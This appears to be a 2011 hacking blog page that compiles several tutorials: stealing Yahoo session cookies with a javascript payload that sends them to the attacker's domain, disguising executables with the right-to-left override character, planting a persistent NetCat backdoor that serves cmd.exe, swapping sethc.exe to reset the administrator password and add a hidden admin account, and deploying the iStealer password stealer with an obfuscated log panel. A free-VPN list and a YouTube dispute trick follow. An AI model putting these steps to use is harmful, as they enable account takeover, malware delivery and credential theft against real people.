DarkComet RAT v3.0 tutorial [HQ] very detailed ★ n00b friendly ★

Author AnuBis

Thursday, 10 March 2011 // Labels: Tutorials // 2 comments //

HACK YAHOO ACCOUNT BY STEALING COOKIES (SESSION HIJACKING)

HACK YAHOO ACCOUNT BY STEALING COOKIES (SESSION HIJACKING)

Author : CR@SH n Burn

I am gonna tell you how to hack any yahoo account by stealing cookies or we can say stealing session IDs.

First of all I want to tell you the basics of the cookies.

What are session cookies or session IDs?
Whenever we sign into an account it generates a unique piece of string. One copy is saved on server and other in our browser as cookie. Both are matched every time we do anything in our account. Session cookies enable the website you are visiting to keep track of your movement from page to page so you don't get asked for the same information you've already given to the site. Cookies allow you to proceed through many pages of a site quickly and easily without having to authenticate or reprocess each new area you visit. This piece of string or login session is destroyed when we click on 'Sign Out' option.

Just visit yahoo.com. Type in browser

Code:
javascript:alert(document.cookie);

You would get a pop up box showing you the cookies left by yahoo on our PC.

Now login to your account and do same thing, you would see some more elements added to the cookies. These represent sessions ids.

So it means sessions are stored in our browser in form of cookies.

An attacker can steal that session by convincing slave to run a piece of code in browser. Attacker can use that stolen session to login into slave's account without providing any username/password. This attack is very uncommon because when the slave clicks 'Sign out', session gets destroyed and attacker too also gets signed out.

But in case of yahoo, it’s not the same. The attacker doesn’t get signed out when slave clicks 'Sign out'. Though the session automatically gets destroyed after 24hrs by yahoo. But when user simply refreshes the windows in yahoo account, he gets sessions again for next 24 hrs. This means, once the yahoo account session is stolen, attacker can access the account for life time by refreshing window in every 24hrs. I am not actually sure whether its 24 or 48 hrs.

Download the required script from here:
Cookie Stealer Script

Steps for stealing session cookies:

1. Sign Up for an account at any free web hosting site.
I have chosen my3gb.com.

2. Now login to your account and go to file manager.

3. Now upload the four files that you have just downloaded. And also make a new directory named 'cookies' here.

4. Now give this code to slave to run in his browser when he would be logged in to his yahoo account.

Code:
javascript:document.location='http://yourdomain.com/yahoo.php?ex='.concat(escape(document.cookie));

Quote:

Here is Yahoo.php basically a cookie stealing script and hacked.php executes the stolen cookies in browser.
Stolen cookies get stored in directory 'cookies'

When the slave runs the code in his browser, he would again redirect to his yahoo account.

5. Now open the hacked.php.
Url would be: http://yourdomain.com/hacked.php

And enter the password (Default password is CR@5H n BURN)

Now you must have got the username of slave's account. Simply Click on it and it would take you to inbox of slave's yahoo account without asking for any password.
Now it doesn't matter if slave signs out from his account, you would remain logged into it.

Note: You can try this attack by using two browsers. Sign in into yahoo account in one browser and run the code. Then sign in through other browser using stolen session.

Thanks

Credit goes to M. Makker

You can download the written guide from here(PDF):
http://hotfile.com/dl/109401527/8a29ad6/...s.rar.html

// Labels: Tutorials // 1 comments //

FILE EXTENSION EXPLOIT! Make .exe look like a jpeg, mp3 or whatever you like!

Original tutorial by me. Enjoy!

This tutorial will show you how to make your .exe (or .com/.scr) files look like .jpeg/.mp3 or any other filetype! By normally changing the extension to e.g .mp3, will corrupt your file, but with this exploit your file will still be executable!

__

1. I have my server.exe, but I want it to look like a mp3 file, so people would run it. In this case, you should change the .exe to .scr to make it look more legit in the end.

Now, rename your server.scr (which is still executable) to "songname uploaded by .SCR" (notice the space).

2. Now it's time to use the exploit! Open up the Character Map:

Scroll down and find the "U+202E: Right-To-Left Override" character:

Click "Select" and then "Copy".

3. Now choose to rename your file, and paste the copied character right before the ".SCR" (press ctrl+v to paste)

Then type "3pm" (without the " ") and press Enter. Now it should look like this:

Done! Obviously you might want to change the icon to look like an mp3 before doing this..

A short video can be found here:
- [MediaFire]
- [MultiUpload]
- [Youtube]
(Watch in HD + Fullscreen)

__

Most browsers have patched this, but it can be used on IM's like MSN or Yahoo Messenger. To upload the file to a filehost, you need to make a .rar file with your server inside.

Spoiler (Click to Hide)

Now go ahead and mix around with .exe/.scr/.com and the fake-extensions to find some other legit-looking combinations!

If you have any questions, feel free to ask!

Also, here's a .pdf explaining the exploit: http://dl.packetstormsecurity.net/papers...erride.pdf

And PLEASE say 'Thanks!' if you find this tutorial useful!

__

Those who can't find the character in the default CharMap in windows, do this:(not sure if it works but worth a try)

1. Download BabelMap and run it.

2. Open this picture:

- Make sure "Single Font" is ticked and "Arial Unicode MS" is chosen as Font.
- Search for OVERRIDE and click on the RTLO character (row 2020, column E)
- Click on the Select-button
- Click on the Copy button

Also, those who have problems with WinXP and non-english OS versions, take a look atthis.

// Labels: Tutorials // 1 comments //

List For Free Vpn

List of free VPNs:

SecurityKIS http://www.securitykiss.com/sk/index.php
Free VPN http://thefreevpn.com/
proXPN http://proxpn.com/
USA IP http://www.usaip.eu/en/free_vpn.php
Open VPN http://openvpn.net/
Its Hidden http://itshidden.com/
Cyberghost http://cyberghostvpn.com/ --> Good for germany
Hotspot Shield http://anchorfree.com/downloads/hotspot-shield/
VPN Tool http://www.vpntool.com/services.php --> good US
Tor VPN https://torvpn.com/information.html

// Labels: Hacking Tools // 1 comments //

Creating a backdoor, and connecting to it, with NetCat

Most of you are probably asking what is NetCat? To make it simple, NetCat/NC makes and accepts Transmission Control Protocol (TCP) and User Datagram Protocol (UDP) connections. Literally that's it lol

This is for the newbees who dont know what NC is and want to know how to backdoor using this software.

How to make a persistent backdoor with NetCat

This is the overview of what we are going to be doing. The fist thing we want to do is put nc.exe, which is the executable file, in system32. Then After that we are going to head to CMD and make a persistent listener.

1. Downlaod NC
http://www.downloadnetcat.com/

2. Place NC.exe in system32

3. Go to CMD and type this Command Line.

Code:
nc -v -L -p 80 -e cmd.exe

Let me explain the code, -v is verbose, -L is to make it Listen which is different from -l because if you would have put -l parameters instead of -L parameters, once you close the CMD window, the NC session will be closed as well. -p is the port you want to listen to. -e is the executable program you want to launch once the connection is established, in our case, command prompt.

Now you can close the window and still have NC listening on port 80. Now that you have backdoored the remote machine with it, its time to connect to it.

On the attacking machine, go to CMD and type this command line:
Code:
nc -v [IpOfTargetMachine] 80

Once you hit enter, you will have CMD access to the remote computer!

Thats about it. If you have any questions about any of this, feel free to ask.

// Labels: Tutorials // 1 comments //

Hack admin password from guest account

Ever wanted to hack your college PC with guest account/student or just wanted to hack your friend’s PC to make him gawk when you tell him your success story of hacking? Well,there is a great way of hacking an administrator account from a guest account by which you can reset the administrator password and getting all the privileges an administrator enjoys on windows.. interested? read on…

Concept:

Press shift key 5 times and the sticky key dialog shows up.This works even at the logon screen. But If we replace the sethc.exe which is responsible for the sticky key dialog,with cmd.exe, and then call sethc.exe by pressing shift key 5 times at logon screen,we will get a command prompt with administrator privileges because no user has logged on. From there we can hack the administrator password,even from a guest account.

Prerequisites:

Guest account with write access to system32.

Here is how to do that -

* Go to C:/windows/system32
* Copy cmd.exe and paste it on desktop
* Rename cmd.exe to sethc.exe
* Copy the new sethc.exe to system 32,when windows asks for overwriting the file,then click yes.
When asked to overwrite,overwrite the sethc.exe
* Now log ut from your guest account and at the user select window,press shift key 5 times.
* Instead of sticky Key confirmation dialog,command prompt with full administrator privileges will open.
* Now type “ NET USER ADMINISTRATOR aaa” where “aaa” can be any password you like and press enter.
* You will see “ The command completed successfully” and then exit the command prompt and login into administrator with your new password.
* Congrats You have hacked admin from guest account.

Further..

Also, you can further create a new user at the command prompt by typing “NET USER Mr.MindfReak/ADD” where “Mr.MindfReak” is the username you would like to add with administrator privileges. Then hide your newly created admin account by -

Go to registry editor and navigating to this key

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t]

Here create a new DWORD value, write its name as the “user name” that u created for your admin account!

// Labels: Tutorials // 1 comments //

[BEST] iStealer Tutorial till date - Setup + Hosting + Undetectable PHP [TUT]

thanks to CATMAN for the pics

STEP 1 :- Download iStealer 6.3 Legends

Here is the download link :-
http://www.filesonic.pk/file/56964437/iStealer_6.3_Legends.rar

It WILL show a virus , but its just a false positive since this is a stealer software, so don't worry.

A virus scan if you still need it :-

File Info

Report date: 2011-02-26 06:46:49 (GMT 1)
File name: istealer-6-3-legends-exe
File size: 1712128 bytes
MD5 Hash: 3e6dde21e8d59ecd96ebb077a5b4ae3d
SHA1 Hash: 951f04364f97007021b17664a8ddea32b52ad126
Detection rate: 14 on 16 (88%)
Status: INFECTED

Detections

a-squared - Trojan-PWS.Win32.Dybalom!IK
Avast - Win32:Malware-gen
AVG - PSW.Generic8.YN
Avira AntiVir - TR/Spy.Gen2
BitDefender - Gen:Trojan.Heur.VP.OD0@amglpWk
ClamAV - Trojan.Spy-75681
Comodo - TrojWare.Win32.Trojan.Agent.~KRV
Dr.Web - Trojan.Siggen1.39351
F-PROT6 - W32/Trojan2.MMBV
Ikarus T3 - Trojan-PWS.Dybalom
Kaspersky -
NOD32 - Win32/TrojanDropper.VB.NPB
Panda -
TrendMicro - TROJ_MDROP.ZV
VBA32 - Trojan-PSW.Win32.Dybalom.cwj
VirusBuster - Trojan.DR.VB!bKKvqH8AIGs

Scan report generated by
NoVirusThanks.org

STEP 2 :- Making a free account at 000webhost.com

Now , the account is made. (Confirm it from your email)

Now, login to the account and go to the Control Panel (CPanel)

Scroll down to MySQL under "Software / Services".

Follow this picture now :

Now, SAVE the info you receive about on the next page in notepad.

STEP 3 :- Setting up index.php file (Php Logger)

Extract iStealer 6.3 rar file and after that extract PHP Logger rar file.

You will see PHP Logger folder.Open it.Now you see two files.
index.php
style.css

Open index.php using notepad and follow this pic :

To remember :- The admin and admin which you entered in $username and$password line is the password to see your logs.

STEP 4 :- Making your index.php undetectable by hosts like 000webhost

Open index.php and change the following lines

PHP Code:
$html  = "<html><head><title>iStealer 6.1 Legends Log manager - ";
to

PHP Code:
$html  = "<html><head><title>My Personal Software manager - ";

and

PHP Code:
$footer  = "<div id='footer'>iStealer 6.1 Legends - Kizar Labs 2009</div></div></body></html>";
to

PHP Code:
$footer  = "<div id='footer'>Backup manager - Backup Script 2010</div></div></body></html>";

Now download and install this software : TrueBug PHP Obfuscator & Encoder. (Google for download link, trial version is also ok.)

Open it and go to "Files and Folders"

Source Folder - select folder containing your PHP scripts, click on the browse button beside the folder name box.

Target Folder - select folder where the obfuscated and encoded files will save to, click on the browse button beside the folder name box. Select files to be obfuscated/encoded, click on check-box front of filename (index.php) in the file list-box

Now to go "Obfuscate & Encode" Set the output options as "Obfuscate & Encode" and check EVERYTHING and click "Process" then press "Close" button and also close program.
You will find an obduscated index.php in the output folder which you selected. Now remember this is the index.php which you have to upload to 000webhost , not the original one.

STEP 5 :- Uploading Files (index.php and style.css on 000webhost)

Go to your Control Panel in 000webhost

Now, Go to File Manager. If it asks for password , see the "View FTP Details" which appears beside File Manager in Control Panel.

Now to go public_html. Then click on "New dir". Enter the directory name like hobby or work or passion or something like that.

Now go the the directory you just created and create further 2 sub-directories inside it as you did in the previous step.

So it will be something like this public_html > hobby > test and work

Now go to any of the last 2 directories you just created and click on the "Upload button" select index.php and style.css and then click the Tick button to upload.

Go back to the root folder and tick the box beside public_html and then click on the "Chmod" button and follow this pic :

STEP 6 :- Building your iStealer

Run the iStealer 6.3 Legends.exe (as admin if you use vista/7 )

Enter the link to your index.php file in the Url field.
For example :- http://barney.site50.net/hobby/work/index.php

Click on Test Url. If it shows success , then you have set up everything correctly and if it shows some error then there is something wrong you have done in the uploading part or the link was not proper.

Now click on Build.

To access your log , go to your web browser and enter the link to your index.php file.

CONGRATS ! Your server is now ready !!

// // 1 comments //

Youtube Deleted Your Song For Copyright? How to Fix!

1. Login with your youtube account and go to "My Videos"

[Image: 1.png]

2. Select "View Copyright Info" on the video you are having copyright issues with.

[Image: 2.png]

3. Scroll down and pick the option "I want to learn more about this dispute process".

[Image: 3.png]

4. Scroll down and pick the option "Take me to the dispute form".

[Image: 4.png]

5. Pick option #2 and paste the following statement into the text bar next to it;

"I have followed the copyright law correctly, its non-profit and the songs are credited." or "Copyright Disclaimer Under Section 107 of the Copyright Act 1976, allowance is made for "fair use" for purposes such as criticism, comment, news reporting, teaching, scholarship, and research. Fair use is a use permitted by copyright statute that might otherwise be infringing. Non-profit, educational or personal use tips the balance in favor of fair use."

[Image: 5.png]

6. Fill out the rest of the info on the page. Use your YouTube name where it asks for it. Choose "Continue" when all information has been filled out.

7. Scroll down on the next page and select "Submit dispute".

[Image: 6.png]

Also this always works for me, and if it does not work, make sure its only the song or music that is claimed for copyright.